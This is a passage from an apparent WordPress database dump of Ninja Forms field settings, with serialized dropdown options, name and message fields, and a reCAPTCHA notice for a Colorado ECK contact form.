Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8344,79,'custom_name_attribute','','custom_name_attribute',''),(8345,79,'personally_identifiable','','personally_identifiable',''),(8346,79,'value','','value',''),(8347,80,'field_label','Last Name','field_label','Last Name'),(8348,80,'field_key','lastname_240','field_key','lastname_240'),(8349,80,'custom_name_attribute','lname','custom_name_attribute','lname'),(2251,71,'key','listselect_25','key','listselect_25'),(2252,71,'container_class','','container_class',''),(2253,71,'parent_id','8','parent_id','8'),(2254,72,'objectType','Field','objectType','Field'),(2255,72,'objectDomain','fields','objectDomain','fields'),(2256,72,'editActive','','editActive',''),(2257,72,'order','7','order','7'),(2258,72,'type','hr','type','hr'),(2259,72,'label','hr','label','hr'),(2260,72,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2261,72,'show_desc','0','show_desc','0'),(2262,72,'desc_pos','none','desc_pos','none'),(2263,72,'desc_text','','desc_text',''),(2264,72,'element_class','','element_class',''),(2265,72,'key','hr_26','key','hr_26'),(2266,72,'container_class','','container_class',''),(2267,72,'parent_id','8','parent_id','8'),(2268,73,'objectType','Field','objectType','Field'),(2269,73,'objectDomain','fields','objectDomain','fields'),(2270,73,'editActive','','editActive',''),(2271,73,'order','8','order','8'),(2272,73,'type','html','type','html'),(2273,73,'label','Colorado Leadership Positions','label','Colorado Leadership Positions'),(2274,73,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2275,73,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>'),(2276,73,'desc_el','div','desc_el','div'),(2277,73,'show_desc','0','show_desc','0'),(2278,73,'desc_pos','none','desc_pos','none'),(2279,73,'desc_text','','desc_text',''),(2280,73,'element_class','','element_class',''),(2281,73,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>'),(2282,73,'key','html_27','key','html_27'),(2283,73,'container_class','','container_class',''),(2284,73,'parent_id','8','parent_id','8'),(2285,74,'objectType','Field','objectType','Field'),(2286,74,'objectDomain','fields','objectDomain','fields'),(2287,74,'editActive','','editActive',''),(2288,74,'order','9','order','9'),(2289,74,'type','listselect','type','listselect'),(2290,74,'label','Select the person you would like to email','label','Select the person you would like to email'),(2291,74,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2292,74,'label_pos','above','label_pos','above'),(2293,74,'list_type','dropdown','list_type','dropdown'),(2294,74,'multi_size','5','multi_size','5'),(2295,74,'list_show_value','1','list_show_value','1'),(2296,74,'list','a:0:{}','list','a:0:{}'),(2297,74,'user_info_field_group','','user_info_field_group',''),(2298,74,'calc_auto_include','0','calc_auto_include','0'),(2299,74,'user_state','0','user_state','0'),(2300,74,'num_sort','0','num_sort','0'),(2301,74,'admin_label','','admin_label',''),(2302,74,'show_help','0','show_help','0'),(2303,74,'help_text','','help_text',''),(2304,74,'show_desc','0','show_desc','0'),(2305,74,'desc_pos','none','desc_pos','none'),(2306,74,'desc_text','','desc_text',''),(2307,74,'element_class','','element_class',''),(2308,74,'required','1','required','1'),(2309,74,'options','a:5:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"ECK Temple Director\";s:5:\"value\";s:19:\"eck-temple-director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ECK Temple Vahana Leader\";s:5:\"value\";s:24:\"ECK Temple Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Administrative Services\";s:5:\"value\";s:23:\"Administrative Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:5:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"ECK Temple Director\";s:5:\"value\";s:19:\"eck-temple-director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ECK Temple Vahana Leader\";s:5:\"value\";s:24:\"ECK Temple Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Administrative Services\";s:5:\"value\";s:23:\"Administrative Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8339,78,'field_label','Text','field_label','Text'),(8340,78,'field_key','html_238','field_key','html_238'),(8341,78,'drawerDisabled','','drawerDisabled',''),(8342,79,'field_label','First Name','field_label','First Name'),(8343,79,'field_key','textbox_239','field_key','textbox_239'),(2310,74,'key','listselect_28','key','listselect_28'),(2311,74,'container_class','','container_class',''),(2312,74,'parent_id','8','parent_id','8'),(2313,75,'objectType','Field','objectType','Field'),(2314,75,'objectDomain','fields','objectDomain','fields'),(2315,75,'editActive','','editActive',''),(2316,75,'order','10','order','10'),(2317,75,'type','textarea','type','textarea'),(2318,75,'label','Enter Your Message Here','label','Enter Your Message Here'),(2319,75,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2320,75,'label_pos','above','label_pos','above'),(2321,75,'default_value','','default_value',''),(2322,75,'textarea_rte','0','textarea_rte','0'),(2323,75,'textarea_media','0','textarea_media','0'),(2324,75,'disable_rte_mobile','0','disable_rte_mobile','0'),(2325,75,'input_limit','','input_limit',''),(2326,75,'input_limit_type','char','input_limit_type','char'),(2327,75,'calc_auto_include','0','calc_auto_include','0'),(2328,75,'num_sort','0','num_sort','0'),(2329,75,'admin_label','','admin_label',''),(2330,75,'show_help','0','show_help','0'),(2331,75,'help_text','','help_text',''),(2332,75,'show_desc','0','show_desc','0'),(2333,75,'desc_pos','none','desc_pos','none'),(2334,75,'desc_text','','desc_text',''),(2335,75,'element_class','','element_class',''),(2336,75,'required','1','required','1'),(2337,75,'default','','default',''),(2338,75,'key','textarea_29','key','textarea_29'),(2339,75,'placeholder','','placeholder',''),(2340,75,'container_class','','container_class',''),(2341,75,'manual_key','','manual_key',''),(2342,75,'parent_id','8','parent_id','8'),(17583,632,'key','html_1663800586504','key','html_1663800586504'),(17582,632,'element_class','','element_class',''),(17581,632,'container_class','','container_class',''),(17580,632,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17579,632,'type','html','type','html'),(17578,632,'label','HTML','label','HTML'),(17577,632,'idAttribute','id','idAttribute','id'),(2360,77,'objectType','Field','objectType','Field'),(2361,77,'objectDomain','fields','objectDomain','fields'),(2362,77,'editActive','','editActive',''),(2363,77,'order','12','order','12'),(2364,77,'type','submit','type','submit'),(2365,77,'label','Submit','label','Submit'),(2366,77,'input_limit_msg','character(s) left','input_limit_msg','character(s) 